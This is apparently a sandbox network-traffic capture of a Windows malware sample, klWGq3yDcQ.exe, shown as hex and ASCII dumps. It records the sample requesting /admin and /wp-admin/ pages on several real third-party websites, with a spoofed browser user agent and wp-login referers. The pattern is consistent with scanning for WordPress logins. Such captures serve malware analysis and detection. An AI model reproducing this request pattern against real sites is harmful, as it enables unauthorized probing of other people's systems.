                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20
                                                                                                                                                                                                    Data Ascii: ionID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d
                                                                                                                                                                                                    Data Ascii: ed:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0}
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 70 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30
                                                                                                                                                                                                    Data Ascii: p="All configuration objects require an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 2c 45 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74
                                                                                                                                                                                                    Data Ascii: ,E={};function j(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent ident
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 3d 3e 61 2c 63 76 3a 28 29 3d 3e 6c 2c 69 53 3a 28 29 3d 3e 6f 2c 69 6c 3a 28 29 3d 3e 72 2c 75 78 3a 28 29 3d 3e 63 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61
                                                                                                                                                                                                    Data Ascii: =>a,cv:()=>l,iS:()=>o,il:()=>r,ux:()=>c,v6:()=>i,w1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNaviga
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 6e 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 72 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69
                                                                                                                                                                                                    Data Ascii: es(t)&&(this.sharedContext[t]=n)}))}catch(e){(0,r.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priori
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 7b 7d 76 61 72 20 67 3d 7b 6f 6e 3a 68 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 68 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65
                                                                                                                                                                                                    Data Ascii: {}var g={on:h,addEventListener:h,removeEventListener:function(e,t){var n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.le
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 62 50 3a 28 29 3d 3e 73 2c 69 7a 3a 28 29 3d 3e 63 2c 6d 24 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 33 38 35 29 3b 6c 65 74 20 69 3d 21 31 2c 61 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c
                                                                                                                                                                                                    Data Ascii: rict";n.d(t,{bP:()=>s,iz:()=>c,m$:()=>o});var r=n(385);let i=!1,a=!1;try{const e={get passive(){return i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    424192.168.2.45103034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC175OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC923INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 34 2e 31 34 36 31 30 33 37 32 39 33 33 30 31 36 33 33 30 39 32 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978384.14610372933016330920Cache-Control: public,max-age=0,must-revalidateServer
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1252INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1252INData Raw: 5d 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 61 6e 67 75 6c 61 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e
                                                                                                                                                                                                    Data Ascii: ]--><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/angular.min.js"></script> ... --><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC361INData Raw: 2d 62 72 6f 77 73 65 72 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 68 65 61 64 65 72 22 3e 45 72 72 6f 72 20 34 30 34 2d 4e 6f 74 42 72 61 6e 64 65 64 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73
                                                                                                                                                                                                    Data Ascii: -browser-wrapper"> <h1 class="non-angular-supported-browser-header">Error 404-NotBranded occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your brows


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    425192.168.2.45082195.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC274OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=9lma3oral9i39bi8q8vm70o157
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://beachrecruitment.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 30 61 62 37 61 34 35 61 37 30 61 64 61 66 37 38 39 32 33 30 65 38 32 32 61 61 34 33 31 62 37 33 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 34 34 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:44 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=0ab7a45a70adaf789230e822aa431b73|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:44 G
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC9214INData Raw: 32 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 23F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC16384INData Raw: 34 34 42 31 0d 0a 36 37 38 2f 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 38 35
                                                                                                                                                                                                    Data Ascii: 44B1678/cat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920" height="85
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1209INData Raw: 32 33 2d 32 30 35 30 32 38 38 22 20 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 3e 30 32 33 2d 32 30 35 30 32 38 38 3c 2f 41 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 36 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 33 3c 2f 62 3e 20 42 45 41 43 48 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42
                                                                                                                                                                                                    Data Ascii: 23-2050288" target=_blank>023-2050288</A></div><div class="cleaner"></div>...LINKS--></div></div></li> </ul> </div></footer><section id="s6"> <div class="sw"> <b>Copyright &copy; 2023</b> BEACH Recruitment B
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    426192.168.2.45073118.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC190OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    427192.168.2.45082292.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC210OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://bunasta.eu/wp-login.php
